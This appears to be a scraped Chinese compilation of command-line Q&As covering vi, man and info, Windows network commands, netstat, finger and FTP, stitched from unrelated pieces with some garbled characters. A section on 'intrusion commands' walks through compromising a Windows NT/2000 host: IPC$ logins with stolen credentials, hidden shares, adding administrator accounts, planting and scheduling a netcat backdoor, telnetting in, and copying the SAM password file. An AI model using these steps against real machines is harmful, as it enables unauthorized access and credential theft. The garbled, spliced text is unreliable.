1. linux .vimrc 怎樣保存退出。我看資料說是設置完後$:x 或者 $wq 進行保存退出即可,但怎麼操作呢
首先要把文件改成可寫模式,即chmod 777 你的文件名字。
然後在vi 你的文件名字,改好之後要按esc鍵,多按幾次,
然後按住shift+;鍵,(L旁邊的那個鍵)
輸入wq!(三個字一個都不能少)敲回車,ok!
2. linux下的man和info命令
1. man
man,即 manunal,是 UNIX 系統手冊的電子版本。根據習慣,UNIX 系統手冊通常分為不同的部分(或小節,即 section),每個小節闡述不同的系統內容。目前的小節劃分如下:
命令:普通用戶命令
系統調用:內核介面
函數庫調用:普通函數庫中的函數
特殊文件:/dev 目錄中的特殊文件
文件格式和約定:/etc/passwd 等文件的格式
游戲。
雜項和約定:標准文件系統布局、手冊頁結構等雜項內容
系統管理命令。
內核常式:非標準的手冊小節。便於 Linux 內核的開發而包含
其他手冊小節:
l: PostgreSQL 資料庫命令
n: TCL/TK 命令
手冊頁一般保存在 /usr/man 目錄下,其中每個子目錄(如 man1, man2, ..., manl, mann)包含不同的手冊小節。使用 man 命令查看手冊頁。
man 命令行:
man [-acdfFhkKtwW] [-m system] [-p string] [-C config_file] [-M path] [-P pager] [-S section_list] [section] name
常用命令行:
$ man open
$ man 7 man
$ man ./myman.3
2. info
Linux 中的大多數軟體開發工具都是來自自由軟體基金會的 GNU 項目,這些工具軟體件的在線文檔都以 info 文件的形式存在。info 程序是 GNU 的超文本幫助系統。
info 文檔一般保存在 /usr/info 目錄下,使用 info 命令查看 info 文檔。
要運行 info,可以在 shell 提示符後輸入 info,也可以在 GNU 的 emacs 中鍵入 Esc-x 後跟 info。
info 幫助系統的初始屏幕顯示了一個主題目錄,你可以將游標移動到帶有 * 的主題菜單上面,然後按回車鍵
進入該主題,也可以鍵入 m,後跟主題菜單的名稱而進入該主題。例如,你可以鍵入 m,然後再鍵入 gcc 而進
進入 gcc 主題中。
如果你要在主題之間跳轉,則必須記住如下的幾個命令鍵:
* n:跳轉到該節點的下一個節點;
* p:跳轉到該節點的上一個節點;
* m: 指定菜單名而選擇另外一個節點;
* f:進入交叉引用主題;
* l:進入該窗口中的最後一個節點;
* TAB:跳轉到該窗口的下一個超文本鏈接;
* RET:進入游標處的超文本鏈接;
* u:轉到上一級主題;
* d:回到 info 的初始節點目錄;
* h:調出 info 教程;
* q:退出 info。
3. linux的man命令用不了
linux中,執行man命令查詢幫助文檔時,是以vi形式打開幫助文檔,所以退出時應該鍵入:q命令,如查詢yum命令的幫助文檔得到結果鍵入:q,退出
4. linux中man命令的使用
您好,man命令的使用
1.man命令的使用
在命令行中輸入「man df」即可以查看df命令的使用語法,參數等等。如果系統中存在該命令的使用手冊,則會在命令行顯示界面顯示出來,如果沒有該命令的用戶使用手冊,則會顯示「No manual entry for 」。
2.man命令顯示內容的查看鍵
1.向後翻一屏:space(空格鍵) 2.向前翻一屏:b 3.向後翻一行:Enter(回車鍵) 4.向前翻一行:k 5./關鍵詞 向後查找 6.n:下一個 7. ?關鍵詞 向前查找 8.N:前一個
3.退出man命令
查看完後,如果想退出命令,在命令行中輸入「q」即可退出查看界面進入命令行界面。q取quit退出的意思。
擴展閱讀
除man外,linux中help命令、info命令也起到用戶手冊查看的作用,但三者得到的信息詳細程度不同,info比man多,man比help多。
5. man命令有什麼作用
man命令:可以通過一些參數,快速查詢linux幫助手冊,並且格式化顯示。
使用語法:
man [-adfhktwW] [section] [-M path] [-P pager] [-S list] [-m system] [-p string] title..
參數說明:
-a 顯示所有匹配項
-d 顯示man查照手冊文件時候,搜索路徑信息,不顯示手冊頁內容
-D 同-d,顯示手冊頁內容
-f 同命令whatis ,將在whatis資料庫查找以關鍵字開同的幫助索引信息
-h 顯示幫助信息
-k 同命令apropos 將搜索whatis資料庫,模糊查找關鍵字
-S list 指定搜索的領域及順序 如:-S 1:1p httpd 將搜索man1然後 man1p目錄
-t 使用troff 命令格式化輸出手冊頁 默認:groff輸出格式頁
(5)man命令退出擴展閱讀
man命令簡介——
只要會用man,Man實際上就是查看指令用法的help,學習任何一種UNIX類的操作系統最重要的就是學會使用man這個輔助命令。
man是manual(手冊)的縮寫字,它的說明非常的詳細,但是因為它都是英文,看起來非常的頭痛。建議大家需要的時候再去看man,平常記得一些基本用法就可以了。
6. 什麼是命令
1.最基本,最常用的,測試物理網路的
ping 192.168.10.88 -t ,參數-t是等待用戶去中斷測試
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 則將DNS改為了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.網路信使
Net send 計算機名/IP|* (廣播) 傳送內容,注意不能跨網段
net stop messenger 停止信使服務,也可以在面板-服務修改
net start messenger 開始信使服務
4.探測對方對方計算機名,所在的組、域及當前用戶名
ping -a IP -t ,只顯示NetBios名
nbtstat -a 192.168.10.146 比較全的
5.netstat -a 顯示出你的計算機當前所開放的所有埠
netstat -s -e 比較詳細的顯示你的網路資料,包括TCP、UDP、ICMP 和 IP的統計等
6.探測arp綁定(動態和靜態)列表,顯示所有連接了我的計算機,顯示對方IP和MAC地址
arp -a
7.在代理伺服器端捆綁IP和MAC地址,解決區域網內盜用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除網卡的IP與MAC地址的綁定:
arp -d 網卡IP
8.在網路鄰居上隱藏你的計算機
net config server /hidden:yes
net config server /hidden:no 則為開啟
9.幾個net命令
A.顯示當前工作組伺服器列表 net view,當不帶選項使用本命令時,它就會顯示當前域或網路上的計算機上的列表。
比如:查看這個IP上的共享資源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享資源
資源共享名 類型 用途 注釋 網站服務 Disk 命令成功完成。
B.查看計算機上的用戶帳號列表 net user
C.查看網路鏈接 net use
例如:net use z: \\192.168.10.8\movie 將這個IP的movie共享目錄映射為本地的Z盤
D.記錄鏈接 net session
例如: C:\>net session
計算機 用戶名 客戶類型 打開空閑時間
\\192.168.10.110 ROME Windows 2000 2195000:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟蹤命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了顯示路由外,還提供325S的分析,計算丟失包的% 11.關於共享安全的幾個命令
A.查看你機器的共享資源 net share
B.手工刪除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d 注意$後有空格。
C.增加一個共享:
c:\net share mymovie=e:\downloads\movie /users:1 mymovie 共享成功。同時限制鏈接用戶數為1人。
12.在DOS行下設置靜態IP
A.設置靜態IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地鏈接" static IP地址 mask gateway
B.查看IP設置
interface ip>show address
測試mtu
ping -f -l size 伺服器ip
教你使用netstat命令
netstat命令的功能是顯示網路連接、路由表和網路介面信息,可以讓用戶得知目前都有哪些網路連接正在運作。
該命令的一般格式為:
netstat [選項]
命令中各選項的含義如下:
-a 顯示所有socket,包括正在監聽的。
-c 每隔1秒就重新顯示一遍,直到用戶中斷它。
-i 顯示所有網路介面的信息,格式同「ipconfig -e」。
-n 以網路IP地址代替名稱,顯示出網路連接情形。
-r 顯示核心路由表,格式同「route -e」。
-t 顯示TCP協議的連接情況。
-u 顯示UDP協議的連接情況。
-v 顯示正在進行的工作。
[例]在本地機上使用netstat命令。
$ netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 1 [ ] STREAM CONNECTED 270 @00000008
unix 1 [ ] STREAM CONNECTED 150 @00000002
unix 1 [ ] STREAM CONNECTED 104 @00000001
unix 1 [ ] STREAM CONNECTED 222 @00000004
unix 1 [ ] STREAM CONNECTED 171 @00000003
unix 1 [ ] STREAM CONNECTED 271 /dev/log
unix 1 [ ] STREAM CONNECTED 225 /dev/log
unix 1 [ ] STREAM CONNECTED 223 /dev/log
unix 1 [ ] STREAM CONNECTED 203 /dev/log
unix 1 [ ] STREAM CONNECTED 105 /dev/log
……
nslookup命令
nslookup命令的功能是查詢一台機器的IP地址和其對應的域名。它通常需要一台域名伺服器來提供域名服務。如果用戶已經設置好域名伺服器,就可以用這個命令查看不同主機的IP地址對應的域名。
該命令的一般格式為:
nslookup [IP地址/域名]
[例]在本地機上使用nslookup命令。
$ nslookup
Default Server: name.tlc.com.cn
Address: 192.168.1.99
>
在符號「>」後面輸入要查詢的IP地址或域名並回車即可。如果要退出該命令,輸入exit並回車即可。
finger命令
finger命令的功能是查詢用戶的信息,通常會顯示系統中某個用戶的用戶名、主目錄、停滯時間、登錄時間、登錄shell等信息。如果要查詢遠程機上的用戶信息,需要在用戶名後面接「@主機名」,採用[用戶名@主機名]的格式,不過要查詢的網路主機需要運行finger守護進程。
該命令的一般格式為:
finger [選項] [使用者] [用戶@主機]
命令中各選項的含義如下:
-s 顯示用戶的注冊名、實際姓名、終端名稱、寫狀態、停滯時間、登錄時間等信息。 -l 除了用-s選項顯示的信息外,還顯示用戶主目錄、登錄shell、郵件狀態等信息,以及用戶主目錄下的.plan、.project和.forward文件的內容。
-p 除了不顯示.plan文件和.project文件以外,與-l選項相同。
[例]在本地機上使用finger命令。
$ finger xxq
Login: xxq Name:
Directory: /home/xxq Shell: /bin/bash
Last login Thu Jan 1 21:43 (CST) on tty1
No mail.
No Plan.
$ finger
Login Name Tty Idle Login Time Office Office Phone
root root *1 28 Nov 25 09:17
……
ping命令
ping命令用於查看網路上的主機是否在工作,它向該主機發送ICMP ECHO_REQUEST包。有時我們想從網路上的某台主機上下載文件,可是又不知道那台主機是否開著,就需要使用ping命令查看。
該命令的一般格式為:
ping [選項] 主機名/IP地址
命令中各選項的含義如下:
-c 數目 在發送指定數目的包後停止。
-d 設定SO_DEBUG的選項。
-f 大量且快速地送網路封包給一台機器,看它的回應。
-I 秒數 設定間隔幾秒送一個網路封包給一台機器,預設值是一秒送一次。
-l 次數 在指定次數內,以最快的方式送封包數據到指定機器(只有超級用戶可以使用此選項)。
-q 不顯示任何傳送封包的信息,只顯示最後的結果。
-r 不經由網關而直接送封包到一台機器,通常是查看本機的網路介面是否有問題。
-s 位元組數 指定發送的數據位元組數,預設值是56,加上8位元組的ICMP頭,一共是64ICMP數據位元組。
TurboLinux系統提供了大量命令和許多實用工具軟體,本書由於篇幅的關系,主要介紹了TurboLinux的一些常用命令和實用軟體。讀者可以使用系統提供的聯機幫助手冊獲取更多的信息。
TurboLinux系統的聯機手冊中有大量的可用信息,根據其內容分成若干節。在Linux聯機幫助手冊上,幾乎每個命令都有說明。因此,當用戶對於Linux上的一個命令不會用或是不太了解時,就請使用聯機幫助命令。
本章主要介紹幾個常用的聯機幫助命令。包括:
man 查詢每個命令的使用方法
help 查詢Shell命令
whereis 查詢某個命令的位置
locate 查詢某個文件的位置
man命令
這個命令應該是每個Linux系統上都有的。它格式化並顯示在線的手冊頁。通常使用者只要在命令man後,輸入想要獲取的命令的名稱(例如 ls),man就會列出一份完整的說明,其內容包括命令語法、各選項的意義以及相關命令等。
該命令的一般形式為:
man [選項] 命令名稱
命令中各選項的含義分別為:
-M 路徑 指定搜索man手冊頁的路徑,通常這個路徑由環境變數MANPATH預設,如果在命令行上指定另外的路徑,則覆蓋MANPATH的設定。
-P 命令 指定所使用的分頁程序,預設使用/usr/bin/less–is,在環境變數MANPAGER中預設。
-S 章節 由於一個命令名稱可能會有很多類別,至於類別,列出如下:
章節 說明
1 一般使用者的命令
2 系統調用的命令
3 C語言函數庫的命令
4 有關驅動程序和系統設備的解釋
5 配置文件的解釋
6 游戲程序的命令
7 其他的軟體或是程序的命令
有關系統維護的命令
-a 顯示所有的手冊頁,而不是只顯示第一個。
-d 這個選項主要在檢查時使用,如果用戶加入了一個新的文件,就可以用這個選項檢查是否出錯,這個選項並不會列出文件內容。
-f 只顯示出命令的功能而不顯示其中詳細的說明文件。
-p string 設定運行的預先處理程序的順序,共有下列幾項:
e eqn t tbl
g grap r refer
p pic v vgrind
-w 不顯示手冊頁,只顯示將被格式化和顯示的文件所在位置。
例如:查看cd命令的使用方法。
$ man cd
cd(n) Tcl Built-In Commands cd(n)
NAME
cd - Change working directory
SYNOPSIS
cd ?dirName?
DEs criptION
Change the current working directory to dirName, or to the
home directory (as specified in the HOME environment vari-
able) if dirName is not given. Returns an empty string.
KEYWORDS
working directory
Tcl 1
(END)
可以按q鍵退出man命令。
help命令
help命令用於查看所有Shell命令。用戶可以通過該命令尋求Shell命令的用法,只需在所查找的命令後輸入help命令,就可以看到所查命令的內容了。
例如:查看od命令的使用方法。
$ od –help
whereis命令
這個程序的主要功能是尋找一個命令所在的位置。例如,我們最常用的ls命令,它是在/bin這個目錄下的。如果希望知道某個命令存在哪一個目錄下,可以用whereis命令來查詢。
該命令的一般形式為:
whereis [選項] 命令名
說明:一般直接使用不加選項的whereis命令,但用戶也可根據特殊需要選用它的一些選項。
該命令中各選項的含義分別為:
b 只查找二進制文件
m 查找主要文件
s 查找來源
u 查找不常用的記錄文件
例如:查找ls命令在什麼目錄下。
$ whereis ls
ls:/bin/ls/usr/man/man1/ls.1
FTP命令是Internet用戶使用最頻繁的命令之一,不論是在DOS還是UNIX操作系統下使用FTP,都會遇到大量的FTP內部命令。熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。
FTP的命令行格式為: ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠程伺服器的所有響應信息;
-i 限制ftp的自動登錄,即不使用;
-n etrc文件;
-d 使用調試方式;
-g 取消全局文件名。
ftp使用的內部命令如下(中括弧表示可選項):
1. ![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip。
2. $ macro-ame[args]:執行宏定義macro-name。
3. account[password]:提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4. append local-file[remote-file]:將本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名。
5. ascii:使用ascii類型傳輸方式。
6. bell:每個命令執行完畢後計算機響鈴一次。
7. bin:使用二進制文件傳輸方式。
8. bye:退出ftp會話過程。
9. case:在使用mget時,將遠程主機文件名中的大寫轉為小寫字母。
10. cd remote-dir:進入遠程主機目錄。
11. cp:進入遠程主機目錄的父目錄。
12. chmod mode file-name:將遠程主機文件file-name的存取方式設置為mode,如: chmod 777 a.out 。
13. close:中斷與遠程伺服器的ftp會話(與open對應)。
14. cr:使用asscii方式傳輸文件時,將回車換行轉換為回行。
15. delete remote-file:刪除遠程主機文件。
16. debug[debug-value]:設置調試方式, 顯示發送至遠程主機的每條命令,如: deb up 3,若設為0,表示取消debug。
17. dir[remote-dir][local-file]:顯示遠程主機目錄,並將結果存入本地文件local-file。
18. disconnection:同close。
19. form format:將文件傳輸方式設置為format,預設為file方式。
20. get remote-file[local-file]: 將遠程主機的文件remote-file傳至本地硬碟的local-file。
21. glob:設置mdelete,mget,mput的文件名擴展,預設時不擴展文件名,同命令行的-g參數。
22. hash:每傳輸1024位元組,顯示一個hash符號(#)。
23. help[cmd]:顯示ftp內部命令cmd的幫助信息,如:help get。
24. idle[seconds]:將遠程伺服器的休眠計時器設為[seconds]秒。
25. image:設置二進制傳輸方式(同binary)。
26. lcd[dir]:將本地工作目錄切換至dir。
27. ls[remote-dir][local-file]:顯示遠程目錄remote-dir, 並存入本地文件local-file。
28. macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29. mdelete[remote-file]:刪除遠程主機文件。
30. mdir remote-files local-file:與dir類似,但可指定多個遠程文件,如: mdir *.o.*.zipoutfile 。
31. mget remote-files:傳輸多個遠程文件。
32. mkdir dir-name:在遠程主機中建一目錄。
33. mls remote-file local-file:同nlist,但可指定多個文件名。
34. mode[modename]:將文件傳輸方式設置為modename, 預設為stream方式。
35. modtime file-name:顯示遠程主機文件的最後修改時間。
36. mput local-file:將多個文件傳輸至遠程主機。
37. newer file-name: 如果遠程機中file-name的修改時間比本地硬碟同名文件的時間更近,則重傳該文件。
38. nlist[remote-dir][local-file]:顯示遠程主機目錄的文件清單,並存入本地硬碟的local-file。
39. nmap[inpattern outpattern]:設置文件名映射機制, 使得文件傳輸時,文件中的某些字元相互轉換,如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變為a1,a2。該命令特別適用於遠程主機為非UNIX機的情況。
40. ntrans[inchars[outchars]]:設置文件名字元的翻譯機制,如ntrans1R,則文件名LLL將變為RRR。
41. open host[port]:建立指定ftp伺服器連接,可指定連接埠。
42. passive:進入被動傳輸方式。
43. prompt:設置多個文件傳輸時的交互提示。
44. proxy ftp-cmd:在次要控制連接中,執行一條ftp命令,該命令允許連接兩個ftp伺服器,以在兩個伺服器間傳輸文件。第一條ftp命令必須為open,以首先建立兩個伺服器間的連接。
45. put local-file[remote-file]:將本地文件local-file傳送至遠程主機。
46. pwd:顯示遠程主機的當前工作目錄。
47. quit:同bye,退出ftp會話。
48. quote arg1,arg2...:將參數逐字發至遠程ftp伺服器,如:quote syst。
49. recv remote-file[local-file]:同get。
50. reget remote-file[local-file]:類似於get,但若local-file存在,則從上次傳輸中斷處續傳。
51. rhelp[cmd-name]:請求獲得遠程主機的幫助。
52. rstatus[file-name]:若未指定文件名,則顯示遠程主機的狀態,否則顯示文件狀態。
53. rename[from][to]:更改遠程主機文件名。
54. reset:清除回答隊列。
55. restart marker:從指定的標志marker處,重新開始get或put,如:restart 130。
56. rmdir dir-name:刪除遠程主機目錄。
57. runique:設置文件名唯一性存儲。
58. send local-file[remote-file]:同put。
59. sendport:設置PORT命令的使用。
60. site arg1,arg2...:將參數作為SITE命令逐字發送至遠程ftp主機。
61. size file-name:顯示遠程主機文件大小,如:site idle 7200。
62. status:顯示當前ftp狀態。
63. struct[struct-name]:將文件傳輸結構設置為struct-name,預設時使用stream結構。
64. sunique:將遠程主機文件名存儲設置為唯一(與runique對應)。
65. system:顯示遠程主機的操作系統類型。
66. tenex:將文件傳輸類型設置為TENEX機的所需的類型。
67. tick:設置傳輸時的位元組計數器。
68. trace:設置包跟蹤。
69. type[type-name]:設置文件傳輸類型為type-name,預設為ascii,如:type binary,設置二進制傳輸方式。
70. umask[newmask]:將遠程伺服器的預設umask設置為newmask,如:umask 3。
71. user user-name[password][account]:向遠程主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。
72. verbose:同命令行的-v參數,即設置詳盡報告方式,ftp伺服器的所有響應都將顯示給用戶,預設為on。
73. ?[cmd]:同help。
入侵命令詳解
--------------------------------------------------------------------------------
1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null密碼為空
退出的命令是
net use \\127.0.0.1\ipc$ /delete
--------------------------------
net share是查看主機共享資源我們用它建一個秘密共享目錄吧net share me=c:\winnt\system32 這樣這個機器就有了一個名為me的共享目錄,而打開它就是winnt下的system32目錄,如果你用win2000的系統就知這個目錄有多重要了,如果不想要也好辦net share me /delete 呵呵,沒有了,是不是很方便的啊。
---------------------- ---------------------- ----------------------
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
---------------------- ---------------------- ----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
net user guest /active:no這樣這個guest的用戶就又被禁用了
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
有人問到提高許可權的問題 下面就解決下
net localgroup administrators guest /add
將guest變為administrator
net命令果然強大啊! net view命令看對方開了共享
-------------------------------------------------------------------------------------------------------------
net user是查看所有用戶列表,看看哪個用戶是和你一樣偷跑進來的,給他名給刪掉,讓他美,
net user 用戶名 /delete哈哈,他沒有了,管他什麼是不是管理員呢,不過我們還是查一下管理員組有什麼用戶吧,這樣的用戶才對我們有用嘛 net localgroup administrators就列出管理員組成員了,再查看一下administrator這個用戶,因為這個是創建系統時建出來的,所以要看看他的系統是什麼時間創建出來的
net user administrator,然後再查看別的管理員用戶是什麼時間創建的,如果相差太遠,那可能是被別人偷偷跑來偷建的,一律del,安全第一哦................
---------------------------------------------------------------------------------------------------------------------------
2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
----------------------
你首先要得到對方的時間,
net time \\127.0.0.1
----------------------
將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
-----------------------------------------------------
at命令功能強大,下面可以打個比方:
C:\> AT 22:30 Start C:\prettyboy.mp3
新加了一項作業,其作業 ID = 1 [現在我們新建立了一個任務 在22:30分 系統將自動播放歌曲]
---------------------------------------------------------------------------------------------------------------------------
3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也就是肉雞.
---------------------------------------------------------------------------------------------------------------------------
4:FTP
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給www.51.NET,不錯的.當我們申請完後,...�約癋TP伺服器.
在上傳前需要登陸先,這里我們假設FTP伺服器www.51.NET,用戶名是HUCJS,密碼是654321
ftp www.51.net
他會要求輸入用戶,成功後會要求輸入密碼.
----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
--------------------------------------------------
這里的問題是兩個命令的解釋正好弄反了,登陸FTP伺服器後get才是下載,而put命令是上傳,這和tftp的命令正好相反,在tftp命令里get是上傳put是下載,這下明白了吧,而且在FTP伺服器中不能用c:\和d:\這樣來指明路徑,這也是在tftp裡面用的方法,FTP可不會執行的,不信你去試好了,正確應該這樣上傳文件put index.htm這樣就足夠了,裝c盤根目錄下的index.htm文件上傳到FTP伺服器的當前目錄下,不喜歡就del index.htm刪掉這文件,下載時先查看一下目錄,dir然後看這個目錄里有什麼,有你要的你就get index.htm這樣就把index.htm這個文件下載到你自己的c盤根目錄下了。
--------------------------------------------------------------
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)"
這句的解釋里就沒有出現錯誤,呵呵,看來那以前的還是馬虎所至吧
好了,總算找出錯處了吧,再說下面吧
5:
下面我說說怎樣把本地的文件復制到對方硬碟上去, 需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要復制到D盤下 把C改為D, 就行了!
index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他復制到 WINNT 目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
---------------------
要把對方的文件復制過來,順便告訴大家 NT的備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的文件名
---------------------- ----------------------
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
這個sam._這明顯是NT主機的口令檔,如果是win2000機器的口令文件應該是sam
-----------------------------------------------------------------------
7. Linux man命令的使用問題
1. 用戶在shell環境中可以操作的命令或可執行文件
2. 系統內核可調用的函數與工具等
3. 一些常用困拿的函數(function)與函數庫(library),大部分為C的函數庫(libc)
4. 設備文件汪孝搭的說明,通常是在/dev下的文件
5. 配置文件或者是某些文件的格式
6. 游戲(games)
7. 慣例與協議等,例如慎大Linux文件系統、網路協議、ASCII code等說明
8. 系統管理員可用的管理命令
9. 跟kernel有關的文件